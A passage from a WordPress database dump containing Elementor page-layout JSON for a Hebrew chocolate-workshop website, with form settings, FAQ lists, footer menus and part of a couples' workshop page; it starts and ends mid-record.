s_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a1a2b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7dc8b868\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"679b4d51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"79e92b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"1755930a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f43216a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"22e902c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"79642803\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31be803d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"68a336e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5bb3e53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b2bedda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"71a725e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(508,118,'_elementor_version','0.4'),(512,119,'_wp_page_template','elementor_canvas'),(513,119,'_elementor_edit_mode','builder'),(514,119,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea 